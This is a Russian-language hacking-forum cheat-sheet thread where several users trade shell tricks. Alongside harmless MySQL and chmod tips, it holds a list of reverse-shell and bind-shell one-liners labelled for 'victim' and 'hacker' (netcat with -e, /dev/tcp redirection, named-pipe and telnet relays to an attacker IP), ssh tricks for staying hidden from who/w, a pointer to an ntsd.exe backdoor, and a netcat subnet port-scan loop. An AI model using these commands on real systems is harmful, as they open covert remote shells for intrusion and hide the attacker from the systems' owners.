Шпаргалка

[SynQ]

Иногда бывает нужно там, где mysql нет, статичный:
mysqldump Ver 10.13 Distrib 5.1.56, for pc-linux-gnu (i686)
static, stripped линк

[SynQ]

Получение cmd шелла на вин-машинах стандартными средствами через ntsd.exe:
http://www.securityaegis.com/ntsd-backdoor/

[M_script]

В запросе mysql нельзя использовать имя одной базы или таблицы в разных регистрах.

верно:

Код:

SELECT * FROM tablename WHERE tablename.columnname=1;
SELECT * FROM TableName WHERE TableName.columnname=1;

неверно:

Код:

SELECT * FROM TableName WHERE tablename.columnname=1;
SELECT * FROM tablename WHERE TableName.columnname=1;

[apache3]

чтобы не было видно по who/w и тд

ssh host /bin/sh


полноценного терминала нет,но он в принципе и не нужен.

в системных логах светитесь.

[ArtOfHack Slon]

apache3, с ключем -i смотрится намного симпатичней

ssh хост "/bin/sh -i"

// а за наводку спасибо, не приходила раньше такая мысль в голову

[python-ptrace]

Цитата:

Сообщение от Strilo4ka

Следующая команда выполнит рекурсивное применение правил для всех файлов в текущей директории, а также для всех файлов во всех поддиректориях:

# find . -type f -exec chmod 777 {} \;

Следующая команда выполнит рекурсивное применение правил для всех директорий в текущей директории, а также для всех директорий во всех поддиректориях:

# find . -type d -exec chmod 777 {} \;

все гораздо проще:
chmod -Rf 0777 ./*

[SynQ]

Юзеру с /bin/false как шелл заблокированы sftp и сам доступ по ssh, однако форвардинг по-прежнему работает с -N и -R/-L.

[Pashkela]

Варианты бекконектов встроенными средствами

================================================== ==================
1#

Жертва:

Код:

$ mknod backpipe p && nc хекер_ip 3337 0<backpipe | /bin/sh 1>backpipe

Хекер:

Код:

$ nc -n -vv -l -p 3337

================================================== ==================
2#

Жертва:

Код:

$ nc хекер_ip 3337 -e /bin/sh

Хекер:

Код:

$ nc -n -vv -l -p 3337

================================================== ==================
3#

Жертва:

Код:

$ /bin/sh -i > /dev/tcp/хекер_ip/3337 0<&1 2>&1

Хекер:

Код:

$ nc -n -vv -l -p 3337

================================================== ==================
4# - без netcat и /dev/tcp/

Жертва:

Код:

$ mknod backpipe p && telnet хекер_ip 3337 0<backpipe | 1>backpipe

Хекер:

Код:

$ nc -n -vv -l -p 3337

================================================== ==================
5# - сервер ждет, когда мы присоединимся на порт 3337

Жертва:

Код:

$ nc -l -p 3337 -nvv -e /bin/sh &

Хекер:

Код:

$ nc -nvv сервер_ip 3337

================================================== ==================
6# - telnet to netcat

Хекер (открываем два терминала сразу, освобождаем два порта - 3337[ввод команд] и 31337[отображение результатов]):

3337:

Код:

$ nc -n -vv -l -p 3337

31337:

Код:

$ nc -n -vv -l -p 31337

Жертва:

Код:

$ telnet хекер_ip 3337 | /bin/bash | telnet хекер_ip 31337

в терминале с портом 3337 набираем команду (например 'ls -la'), в терминале с 31337 видим результаты

[tex]

Цитата:

Сообщение от apache3

чтобы не было видно по who/w и тд

ssh host /bin/sh


полноценного терминала нет,но он в принципе и не нужен.

в системных логах светитесь.

ssh -T host

Цитата:

-T Disable pseudo-tty allocation.

tty кстати потом можно будет подключить сторонним софтом на хосте- это при необходимости к примеру для su, ввод будет кривой но ругатся на отсутствие терминала не будет )

Цитата:

Сообщение от Pashkela

Варианты бекконектов встроенными средствами

хекер:
nc -l 3117|nc -l 3118

жертва:
nc 127.0.0.1 3117|sh|nc 127.0.0.1 3118

вместо nc также телнет может быть

[tex]

подручный сканер хостов

Цитата:

for a in {1..255};do nc -w 1 -z 192.168.1.$a 80;done